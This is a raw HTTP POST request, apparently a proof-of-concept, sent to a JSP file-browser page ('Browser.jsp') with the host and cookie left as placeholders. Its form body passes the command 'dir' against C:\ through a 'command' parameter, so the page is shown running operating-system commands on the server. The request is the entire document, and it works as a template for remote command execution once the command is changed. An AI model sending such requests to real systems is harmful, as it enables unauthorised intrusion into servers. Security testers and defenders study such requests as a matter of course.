POST http://hostx:portx/browserwin/browser/Browser.jsp HTTP/1.1
Host: hostx:portx
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1b4) Gecko/20090427 Fedora/3.5-0.20.beta4.fc11 Firefox/3.5b4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://hostx:portx/browserwin/browser/Browser.jsp
Cookie: cookiex 
Content-Type: application/x-www-form-urlencoded
Content-Length: 46 

text=&dir=C:\&command=dir&Submit=Launch&sort=1
